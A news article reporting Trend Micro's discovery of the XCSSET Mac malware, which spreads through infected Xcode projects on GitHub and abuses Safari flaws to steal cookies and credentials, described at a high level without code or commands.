Trend Micro security researchers have uncovered a new campaign using developers to distribute the XCSSET malware package to unsuspecting Mac users. XCSSET is a new strain of Mac malware capable of hijacking Apple's Safari web browser and injecting malicious JavaScript payloads that can steal passwords, financial data, and personal information. The malware, which can also be used to deploy ransomware, was first discovered in the developers' Xcode projects. Xcode is a free integrated development environment (IDE) used by developers on macOS to build apps for iPhone, iPad, Mac, Apple Watch, and Apple TV. Trend Micro researchers provided additional information about their discovery in a blog post, saying: “This scenario is quite unusual; in this case, malicious code is injected into local Xcode projects so that when the project is built, the malicious code is executed. This presents a risk to Xcode developers in particular. The threat has increased since we identified affected developers who shared their projects on GitHub, triggering a supply chain attack for users who rely on these repositories as dependencies in their own projects. We have also identified this threat from sources like VirusTotal, which indicates that this threat is on the run. "
Malware XCSSET
While cybercriminals often use phishing and spam emails to spread other types of malware, this new campaign takes advantage of the fact that developers often share their work online to spread XCSSET. Trend Micro has already discovered XCSSET-infected Xcode projects on GitHub and VirusTotal, which means this new Mac malware is now making its way across the web. Once XCSSET finds its way to a vulnerable system, the malware targets all installed browsers and uses exploits to steal user data. In Safari, XCSSET exploits a bug in the browser's Data Vault, as well as a second vulnerability in the way Safari WebKit works. The first bug allows malware to bypass macOS System Integrity Protection (SIP) to steal Safari cookies, while the second bug allows an attacker to launch Universal Cross-Site Scripting (UXSS) attacks. According to Trend Micro, the UXSS bug can be used to steal user information, but also to modify browser sessions to view malicious websites, change cryptocurrency wallet addresses, collect information from App Store credit cards, and steal credentials from various other sources, such as Apple ID, Google, PayPal, and Yandex. To prevent the accidental spread of XCSSET malware, Trend Micro recommends that Xcode project owners triple check the integrity of their projects "to permanently eliminate unwarranted problems, such as malware infections on the 'upload.' Via ZDNet